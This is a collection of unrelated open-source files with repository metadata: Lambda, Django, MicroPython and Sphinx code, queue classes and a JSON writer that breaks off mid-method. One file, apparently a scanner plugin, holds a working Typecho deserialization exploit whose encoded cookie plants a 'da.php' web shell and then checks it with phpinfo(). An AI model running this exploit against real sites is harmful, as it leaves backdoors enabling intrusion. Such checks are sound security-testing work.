d49883cc4d4986e11ca66058d5a327691e6e048a
|
refs/heads/master
| 2020-04-13T00:16:54.050913
| 2019-01-15T14:22:15
| 2019-01-15T14:22:15
| 160,260,223
| 0
| 0
|
Apache-2.0
| 2018-12-03T22:07:01
| 2018-12-03T22:07:01
| null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
/home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/text/python/ops/__init__.py
|
[
"ruchika.kharwar@gmail.com"
] |
ruchika.kharwar@gmail.com
|
4638417263f9ca1124e3c02943f4dcd4fb9596f5
|
56c758efde4ed4037a47c1ea6143dd948be81a37
|
/lambda/Web/Web005/Web005.py
|
718e21fe806e1760e43472fd0460ed64eb83e065
|
[] |
no_license
|
umaxyon/pac-job
|
45bf06bffd2f434fb838f0272704f2f782174d0b
|
22bef2c2ea61184e25276859a4f93b3941053c9e
|
refs/heads/master
| 2023-02-27T04:06:29.268008
| 2021-02-10T04:23:36
| 2021-02-10T04:23:36
| 337,614,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
# -*- coding:utf-8 -*-
import os
from common.pacjson import JSON
from common.datetime_util import DateTimeUtil
from common.dao import Dao
from common.price_logic import PriceLogic
def response(body):
return {
"isBase64Encoded": False,
"statusCode": 200,
"headers": {
"Access-Control-Allow-Origin": "*",
"Cache-Control": "no-cache"
},
"body": JSON.dumps(body)
}
def web005_handler(event, context):
""" 現在価格API """
print(DateTimeUtil.str_now())
os.environ["PRODUCTION_DAO"] = "True" # TODO 本番向けテスト用
dao = Dao()
logic = PriceLogic()
uptime = logic.get_now_price_update_time()
cds = event['cds']
print('cds = {}'.format(cds))
cd_list = cds.split('_')
prices = dao.table("stock_price_now").find_batch(cd_list)
return response({ "v": "1", "prices": prices, "now_price_uptime": uptime })
if __name__ == '__main__':
print(web005_handler({'cds': 'USDJPY_3936_8267'}, {}))
|
[
"umaxyon@gmail.com"
] |
umaxyon@gmail.com
|
0f8a80c93d8c3b668c311e6bcd30c6ab0ad43955
|
e17d9d944508b39e74243bf94c5fe34ccf81c99a
|
/tools/codeformat.py
|
f3efb5df75c620a3716d196593ab9f68bf43d760
|
[
"MIT"
] |
permissive
|
rlourette/micropython
|
9f3b4a0895c93f9dd8ae5fe83b92920d3db2d7da
|
dbaaed1697d22046e06a6f3f7ff9a1fbc1d73ee7
|
refs/heads/master
| 2021-02-14T13:11:23.909501
| 2020-03-18T00:07:19
| 2020-03-18T00:07:19
| 244,805,958
| 0
| 0
|
MIT
| 2020-03-04T04:19:58
| 2020-03-04T04:19:57
| null |
UTF-8
|
Python
| false
| false
| 6,006
|
py
|
#!/usr/bin/env python3
#
# This file is part of the MicroPython project, http://micropython.org/
#
# The MIT License (MIT)
#
# Copyright (c) 2020 Damien P. George
# Copyright (c) 2020 Jim Mussared
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import argparse
import glob
import itertools
import os
import re
import subprocess
# Relative to top-level repo dir.
PATHS = [
# C
"extmod/*.[ch]",
"lib/netutils/*.[ch]",
"lib/timeutils/*.[ch]",
"lib/utils/*.[ch]",
"mpy-cross/*.[ch]",
"ports/*/*.[ch]",
"py/*.[ch]",
# Python
"drivers/**/*.py",
"examples/**/*.py",
"extmod/**/*.py",
"ports/**/*.py",
"py/**/*.py",
"tools/**/*.py",
]
EXCLUSIONS = [
# STM32 build includes generated Python code.
"ports/*/build*",
# gitignore in ports/unix ignores *.py, so also do it here.
"ports/unix/*.py",
]
# Path to repo top-level dir.
TOP = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
UNCRUSTIFY_CFG = os.path.join(TOP, "tools/uncrustify.cfg")
C_EXTS = (
".c",
".h",
)
PY_EXTS = (".py",)
FIXUP_REPLACEMENTS = (
(re.compile("sizeof\(([a-z_]+)\) \*\(([a-z_]+)\)"), r"sizeof(\1) * (\2)"),
(re.compile("([0-9]+) \*sizeof"), r"\1 * sizeof"),
)
def list_files(paths, exclusions=None, prefix=""):
files = set()
for pattern in paths:
files.update(glob.glob(os.path.join(prefix, pattern), recursive=True))
for pattern in exclusions or []:
files.difference_update(glob.fnmatch.filter(files, os.path.join(prefix, pattern)))
return sorted(files)
def fixup_c(filename):
# Read file.
with open(filename) as f:
lines = f.readlines()
# Write out file with fixups.
with open(filename, "w", newline="") as f:
dedent_stack = []
while lines:
# Get next line.
l = lines.pop(0)
# Dedent #'s to match indent of following line (not previous line).
m = re.match(r"( +)#(if |ifdef |ifndef |elif |else|endif)", l)
if m:
indent = len(m.group(1))
directive = m.group(2)
if directive in ("if ", "ifdef ", "ifndef "):
l_next = lines[0]
indent_next = len(re.match(r"( *)", l_next).group(1))
if indent - 4 == indent_next and re.match(r" +(} else |case )", l_next):
# This #-line (and all associated ones) needs dedenting by 4 spaces.
l = l[4:]
dedent_stack.append(indent - 4)
else:
# This #-line does not need dedenting.
dedent_stack.append(-1)
else:
if dedent_stack[-1] >= 0:
# This associated #-line needs dedenting to match the #if.
indent_diff = indent - dedent_stack[-1]
assert indent_diff >= 0
l = l[indent_diff:]
if directive == "endif":
dedent_stack.pop()
# Apply general regex-based fixups.
for regex, replacement in FIXUP_REPLACEMENTS:
l = regex.sub(replacement, l)
# Write out line.
f.write(l)
assert not dedent_stack, filename
def main():
cmd_parser = argparse.ArgumentParser(description="Auto-format C and Python files.")
cmd_parser.add_argument("-c", action="store_true", help="Format C code only")
cmd_parser.add_argument("-p", action="store_true", help="Format Python code only")
cmd_parser.add_argument("files", nargs="*", help="Run on specific globs")
args = cmd_parser.parse_args()
# Setting only one of -c or -p disables the other. If both or neither are set, then do both.
format_c = args.c or not args.p
format_py = args.p or not args.c
# Expand the globs passed on the command line, or use the default globs above.
files = []
if args.files:
files = list_files(args.files)
else:
files = list_files(PATHS, EXCLUSIONS, TOP)
# Extract files matching a specific language.
def lang_files(exts):
for file in files:
if os.path.splitext(file)[1].lower() in exts:
yield file
# Run tool on N files at a time (to avoid making the command line too long).
def batch(cmd, files, N=200):
while True:
file_args = list(itertools.islice(files, N))
if not file_args:
break
subprocess.check_call(cmd + file_args)
# Format C files with uncrustify.
if format_c:
batch(["uncrustify", "-c", UNCRUSTIFY_CFG, "-lC", "--no-backup"], lang_files(C_EXTS))
for file in lang_files(C_EXTS):
fixup_c(file)
# Format Python files with black.
if format_py:
batch(["black", "-q", "--fast", "--line-length=99"], lang_files(PY_EXTS))
if __name__ == "__main__":
main()
|
[
"damien.p.george@gmail.com"
] |
damien.p.george@gmail.com
|
2544eeb4281cc5170bf4eb4b998c5a686d6703d3
|
8dd5a2ea25367f06dc1c7752fd22c5d7902cdd54
|
/ask/models.py
|
05dfda568b6d8a9415c0f10328b188b9c163d147
|
[] |
no_license
|
sng1996/DjangoProject
|
7b61f939bc9b1d2a1f8df1593a3946c10846431b
|
ca828e4c6ed179b7bf833f59057440fad5a06a9c
|
refs/heads/master
| 2021-01-20T19:56:38.877644
| 2016-06-12T00:44:32
| 2016-06-12T00:44:32
| 61,306,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,108
|
py
|
from django.db import models
from django.contrib.auth.models import User
import datetime
import MySQLdb
from PIL import Image
# Create your models here.
class QuestionQuerySet(models.QuerySet):
def rating(self):
return self.order_by('-rating')
def added(self):
return self.order_by('-added_at')
def tags(self, argv):
return self.filter(tag__name = argv)
def question(self, question_id):
return self.get(id = int(question_id))
class QuestionManager(models.Manager):
def get_queryset(self):
return QuestionQuerySet(self.model, using=self._db)
def rating(self):
return self.get_queryset().rating()
def added(self):
return self.get_queryset().added()
def tags(self, argv):
return self.get_queryset().tags(argv)
def question(self, question_id):
return self.get_queryset().question(question_id)
class Question(models.Model):
title = models.CharField(max_length=128)
body = models.TextField()
added_at = models.DateTimeField(default=datetime.datetime.now)
author = models.ForeignKey(User)
rating = models.IntegerField(default = 0)
votes = models.ManyToManyField(User, related_name='voted_users', through = 'Like')
questions = QuestionManager()
class AnswerQuerySet(models.QuerySet):
def answer(self, question_id):
return self.filter(question__pk = int(question_id))
class AnswerManager(models.Manager):
def get_queryset(self):
return AnswerQuerySet(self.model, using=self._db)
def answer(self,question_id):
return self.get_queryset().answer(question_id)
class Answer(models.Model):
text = models.TextField()
author = models.ForeignKey(User)
question = models.ForeignKey(Question)
added_at = models.DateTimeField(default=datetime.datetime.now)
answers = AnswerManager()
class Like(models.Model):
user = models.ForeignKey(User)
question = models.ForeignKey(Question)
is_Like = models.BooleanField()
class Tag(models.Model):
name = models.CharField(max_length=32)
rating = models.IntegerField(default = 0)
question = models.ManyToManyField(Question)
class Profile(models.Model):
user = models.OneToOneField(User)
avatar = models.ImageField()
|
[
"seregagavrilko@mail.ru"
] |
seregagavrilko@mail.ru
|
b42422ce5b50e86a6946a8365a3504f6f01362d7
|
df387dcd8815dc632b07d862d693d1f2453af939
|
/conf.py
|
c2223494bcf2900fdd34f1e7698ec9f58a774faf
|
[
"AFL-2.1",
"Python-2.0",
"MIT"
] |
permissive
|
sporty/simplejson
|
805d7b7b39576f16696d7039cc807bc7fc42b89c
|
3eaa8d54dfed8cd64c9f439451f5514f45cd4dd4
|
refs/heads/master
| 2021-01-20T22:02:42.749599
| 2014-07-21T07:33:51
| 2014-07-21T07:33:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,681
|
py
|
# -*- coding: utf-8 -*-
#
# simplejson documentation build configuration file, created by
# sphinx-quickstart on Fri Sep 26 18:58:30 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'simplejson'
copyright = '2014, Bob Ippolito'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '3.5'
# The full version, including alpha/beta/rc tags.
release = '3.5.3'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'simplejsondoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'simplejson.tex', 'simplejson Documentation',
'Bob Ippolito', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
[
"bob@redivi.com"
] |
bob@redivi.com
|
32f152b39e4dc9d912646e98e62dbdb51f4d2eb6
|
6eca0e7fe3978f666744c9bd6ea4d85cf234e0f4
|
/python/app/plugins/http/Typecho/Typecho_Install_Code_Exec.py
|
0e9738e06ab87419089b2e56d9f88b9fb48f87e5
|
[
"MIT"
] |
permissive
|
encore2005/linbing
|
1003459c803316754a86f640821ba237e3d4fb9b
|
46cb780479c6a6908e3ca6fb90d116434dd4d4ce
|
refs/heads/master
| 2023-09-05T16:05:36.668878
| 2021-11-27T15:49:15
| 2021-11-27T15:49:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,531
|
py
|
#!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class Typecho_Install_Code_Exec_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'typecho install.php反序列化命令执行漏洞',
'description': 'typecho install.php反序列化命令执行漏洞,影响范围为: Typecho Typecho 0.9~1.0',
'date': '2017-11-06',
'exptype': 'check',
'type': 'Serializable'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers = {
"User-Agent": get_useragent(),
"Cookie": "__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
"Referer": self.url + "/install.php",
}
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
check_url = self.url + "/install.php?finish=1"
req = request.get(check_url, headers = self.headers)
shellpath = self.url + "/da.php"
post_data ={
"pp":"phpinfo();"
}
check_req = request.post(self.url + "/da.php", data = post_data, headers = self.headers)
if r"Configuration File (php.ini) Path" in check_req.text:
print("存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: " + check_url + "\tshell地址: " + shellpath + "\t密码: pp")
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
Typecho_Install_Code_Exec = Typecho_Install_Code_Exec_BaseVerify('https://127.0.0.1')
Typecho_Install_Code_Exec.check()
|
[
"taomujian@protonmail.com"
] |
taomujian@protonmail.com
|
da64379108d10ffcce480826867a05edd566bdd1
|
895f4befd11c8169f818d229e42bda9c18bdc15d
|
/thndr/api/withdraw.py
|
268400db656a291f7d52d5cfda257ce3c5af9fa0
|
[] |
no_license
|
MostafaMhmod/stocks-exchange-app
|
69fdd0d9ac6ed76537e70cf583ffb4503829cba2
|
0b7134b180cb75b37a3eb0234920da0d1f468019
|
refs/heads/master
| 2023-03-01T00:16:00.658957
| 2021-02-09T00:57:46
| 2021-02-09T00:57:46
| 336,931,433
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
from rest_framework.decorators import api_view
from rest_framework.response import Response
from thndr.serializers.transaction_serializer import TransactionWalletCreateSerializer
@api_view(["POST"])
def withdraw(request):
data = {}
data['user'] = request.data.get('user_id')
data['amount'] = request.data.get('amount')
data['withdraw'] = True
data['deposit'] = False
serializer = TransactionWalletCreateSerializer(data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response({"success": True})
|
[
"moustafa.mahm@gmail.com"
] |
moustafa.mahm@gmail.com
|
2d745cb89d987b4929a5b6b26b7b4039b93fac08
|
ef2f632f814928ff8160c9afd11f55b9b5f4d216
|
/Algorithms/Implementations/my_queue.py
|
01da9166d27c3cd17a65bf9ec99378672fca339c
|
[] |
no_license
|
CBASoftwareDevolopment2020/Exam-Notes
|
319a4f2b445654d4fb56e27c1fb18a40aa0323a4
|
cfc8223377e9a5741a4272c0cd255bd9cae04f85
|
refs/heads/master
| 2022-09-27T22:43:40.757221
| 2020-05-29T11:19:02
| 2020-05-29T11:19:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,412
|
py
|
from utils import Node
class ArrayQueue:
def __init__(self):
self._items = []
self._size = 0
def enqueue(self, item):
self._items.append(item)
self._size += 1
def dequeue(self):
item = self._items.pop(0)
self._size -= 1
return item
def is_empty(self):
return self._size == 0
def get_size(self):
return self._size
def __iter__(self):
yield from self._items[:self._size]
class LinkedQueue:
def __init__(self):
self._first = None
self._last = None
self._size = 0
self._next = None
def enqueue(self, item):
if self._last:
new = Node(item, None, self._last)
self._last.next, self._last = new, new
else:
self._first = self._last = Node(item)
self._size += 1
def dequeue(self):
item, self._first = self._first.item, self._first.next
if self._first is None:
self._last = None
self._size -= 1
return item
def is_empty(self):
return self._size == 0
def get_size(self):
return self._size
def __iter__(self):
self._next = self._first
return self
def __next__(self):
if self._next is None:
raise StopIteration
item, self._next = self._next.item, self._next.next
return item
|
[
"supernikolaj@hotmail.com"
] |
supernikolaj@hotmail.com
|
376e914eb4817ac06c5395b2987741fbc5b63b80
|
4e2b343558ed8f342bdc3ae79bc70a837bd5eb93
|
/AppEngine_lessons/app-engine-starter/main.py
|
4af85521ed36d1795fd71fb5e5e5d9d0e528346a
|
[] |
no_license
|
xmaslzq/CSSI
|
670d9fb8d533ef83418cf3e74725edc9ad1c94e8
|
83c58ca56e17ec4d3abc249369339d28661d1528
|
refs/heads/master
| 2022-01-25T23:04:22.594830
| 2019-06-20T17:11:55
| 2019-06-20T17:11:55
| 192,957,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
import os
import jinja2
#remember, you can get this by searching for jinja2 google app engine
jinja_current_dir = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MemeMainHandler(webapp2.RequestHandler):
def get(self):
start_template = jinja_current_dir.get_template("templates/welcome.html")
self.response.write(start_template.render())
app = webapp2.WSGIApplication([
('/', MemeMainHandler),
], debug=True)
|
[
"noreply@github.com"
] |
xmaslzq.noreply@github.com
|
badb20af55295ca775c372a5144771fd92c5ef52
|
d3700e19ac03dee2b53b5f094105a785a5ac7d6c
|
/source/accounts/forms.py
|
4ed06e720d8bd33fa1290c1259ca2dc40c7c1eaf
|
[] |
no_license
|
emilrakaev/final_exam
|
7ed571f8d073150ba0d0871a5c51556ba077aa8e
|
01b3fa63cdd1d28ce725a6bcc0c1aca5d1fd512d
|
refs/heads/master
| 2023-02-18T03:18:12.760590
| 2021-01-23T17:30:43
| 2021-01-23T17:30:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,752
|
py
|
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import AbstractUser
from django.core.exceptions import ValidationError
from django.urls import reverse
from django.conf import settings
from django import forms
from django.contrib.auth import get_user_model
from .models import AuthToken, Profile, TOKEN_TYPE_PASSWORD_RESET
class MyUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
fields = ['username', 'password1', 'password2',
'first_name', 'last_name', 'email']
def save(self, commit=True):
if settings.ACTIVATE_USERS_EMAIL:
user: AbstractUser = super().save(commit=False)
user.is_active = False
if commit:
user.save()
token = self.create_token(user)
self.send_email(user, token)
else:
user = super().save(commit=commit)
Profile.objects.create(user=user)
return user
# def save(self, commit=True):
# user = super().save(commit=commit)
# Profile.objects.create(user=user)
# return user
def create_token(self, user):
return AuthToken.objects.create(user=user)
def send_email(self, user, token):
if user.email:
subject = 'Вы создали учётную запись на сайте "Мой Блог"'
link = settings.BASE_HOST + reverse('accounts:activate', kwargs={'token': token.token})
message = f'''Здравствуйте, {user.username}!
Вы создали учётную запись на сайте "Мой Блог"
Активируйте её, перейдя по ссылке {link}.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
html_message = f'''Здравствуйте, {user.username}!
Вы создали учётную запись на сайте "Мой Блог"
Активируйте её, перейдя по ссылке <a href="{link}">{link}</a>.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
try:
user.email_user(subject, message, html_message=html_message)
except Exception as e:
print(e)
class UserChangeForm(forms.ModelForm):
class Meta:
model = get_user_model()
fields = ['first_name', 'last_name', 'email']
labels = {'first_name': 'Имя', 'last_name': 'Фамилия', 'email': 'Email'}
class ProfileChangeForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ['user']
class SetPasswordForm(forms.ModelForm):
password = forms.CharField(label="Новый пароль", strip=False, widget=forms.PasswordInput)
password_confirm = forms.CharField(label="Подтвердите пароль", widget=forms.PasswordInput, strip=False)
def clean_password_confirm(self):
password = self.cleaned_data.get("password")
password_confirm = self.cleaned_data.get("password_confirm")
if password and password_confirm and password != password_confirm:
raise forms.ValidationError('Пароли не совпадают!')
return password_confirm
def save(self, commit=True):
user = self.instance
user.set_password(self.cleaned_data["password"])
if commit:
user.save()
return user
class Meta:
model = get_user_model()
fields = ['password', 'password_confirm']
class PasswordChangeForm(SetPasswordForm):
old_password = forms.CharField(label="Старый пароль", strip=False, widget=forms.PasswordInput)
def clean_old_password(self):
old_password = self.cleaned_data.get('old_password')
if not self.instance.check_password(old_password):
raise forms.ValidationError('Старый пароль неправильный!')
return old_password
class Meta:
model = get_user_model()
fields = ['password', 'password_confirm', 'old_password']
class PasswordResetEmailForm(forms.Form):
email = forms.EmailField(required=True, label='Email')
def clean_email(self):
email = self.cleaned_data.get('email')
User = get_user_model()
if User.objects.filter(email=email).count() == 0:
raise ValidationError('Пользователь с таким email-ом не зарегистрирован')
return email
def send_email(self):
User = get_user_model()
email = self.cleaned_data.get('email')
user = User.objects.filter(email=email).first()
token = AuthToken.objects.create(user=user, life_days=3, type=TOKEN_TYPE_PASSWORD_RESET)
subject = 'Вы запросили восстановление пароля для учётной записи на сайте "Мой Блог"'
link = settings.BASE_HOST + reverse('accounts:password_reset', kwargs={'token': token.token})
message = f'''Ваша ссылка для восстановления пароля: {link}.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
html_message = f'''Ваша ссылка для восстановления пароля: <a href="{link}">{link}</a>.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
try:
user.email_user(subject, message, html_message=html_message)
except Exception as e:
print(e)
class PasswordResetForm(SetPasswordForm):
pass
|
[
"emilrakaev@gmail.com"
] |
emilrakaev@gmail.com
|
7e78b16e6f13e52f35217553facf6e447114f404
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2536/60692/284231.py
|
f5965072cfb32c524819a0b6b6eb56e9052005d5
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
from collections import defaultdict
list1 = input()[3:-3].split("\"], [\"")
list1 = [i.split("\", \"") for i in list1]
list1.sort()
res = []
g = defaultdict(list)
print(list1)
'''
for i in range(len(list1)):
g[list1[i][0]].append(list1[i][1])
def dfs(x):
while g[x]:
r = g[x].pop()
dfs(r)
res.append(x)
dfs("JFK")
res.reverse()
print(res)
'''
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
7dc30a8675b6bdd42f226f0d1ba0f8e14ae70ca4
|
e82af0b3f84b66278c232f1d4407d7e6fb67343f
|
/src/aws_scatter_gather/util/jsonstream.py
|
58cbf247e4698690e832aadfd50d83c0f4f588ff
|
[
"Apache-2.0"
] |
permissive
|
cbuschka/aws-scatter-gather
|
5dbe73c1672b786e5d74696cc6a8df6fad859840
|
abebd22aa6449369845a08d4260607745098bb28
|
refs/heads/master
| 2022-12-25T04:00:17.299495
| 2020-09-18T20:33:58
| 2020-09-18T20:55:28
| 271,099,237
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,048
|
py
|
import json
from enum import Enum
class _State(Enum):
INITIAL = 0
OBJECT_STARTED = 1
OBJECT_PROPERTY_STARTED = 2
OBJECT_PROPERTY_AFTER_NAME = 3
OBJECT_PROPERTY_AFTER_VALUE = 4
ARRAY_STARTED = 5
ARRAY_AFTER_VALUE = 6
DONE = 7
class JsonStream(object):
def __init__(self, fp, encoder: json.JSONEncoder = None, indent=None, separators=None):
self._state = []
self._fp = fp
self._indent = indent
if separators is not None:
self._item_separator, self._key_separator = separators
elif indent is not None:
self._item_separator = ','
else:
self._item_separator, self._key_separator = (', ', ': ')
self._encoder = encoder or json.JSONEncoder(indent=self._indent,
separators=(self._item_separator, self._key_separator))
self._push_state(_State.INITIAL)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
def start_array(self):
if self._is_state(_State.INITIAL):
self._fp.write("[")
self._write_indent()
self._set_state(_State.DONE)
self._push_state(_State.ARRAY_STARTED)
elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
self._fp.write("[")
self._write_indent()
self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
self._push_state(_State.ARRAY_STARTED)
else:
self._fail("start array")
def end_array(self):
if self._is_state(_State.ARRAY_STARTED, _State.ARRAY_AFTER_VALUE):
self._fp.write("]")
self._pop_state()
else:
self._fail("end array")
def start_object(self):
if self._is_state(_State.INITIAL):
self._fp.write("{")
self._write_indent()
self._set_state(_State.DONE)
self._push_state(_State.OBJECT_STARTED)
elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
self._fp.write("{")
self._write_indent()
self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
self._push_state(_State.OBJECT_STARTED)
elif self._is_state(_State.ARRAY_STARTED):
self._fp.write("{")
self._write_indent()
self._set_state(_State.ARRAY_AFTER_VALUE)
self._push_state(_State.OBJECT_STARTED)
elif self._is_state(_State.ARRAY_AFTER_VALUE):
self._fp.write("{}{{".format(self._item_separator))
self._write_indent()
self._set_state(_State.ARRAY_AFTER_VALUE)
self._push_state(_State.OBJECT_STARTED)
else:
self._fail("start object")
def start_property(self, name):
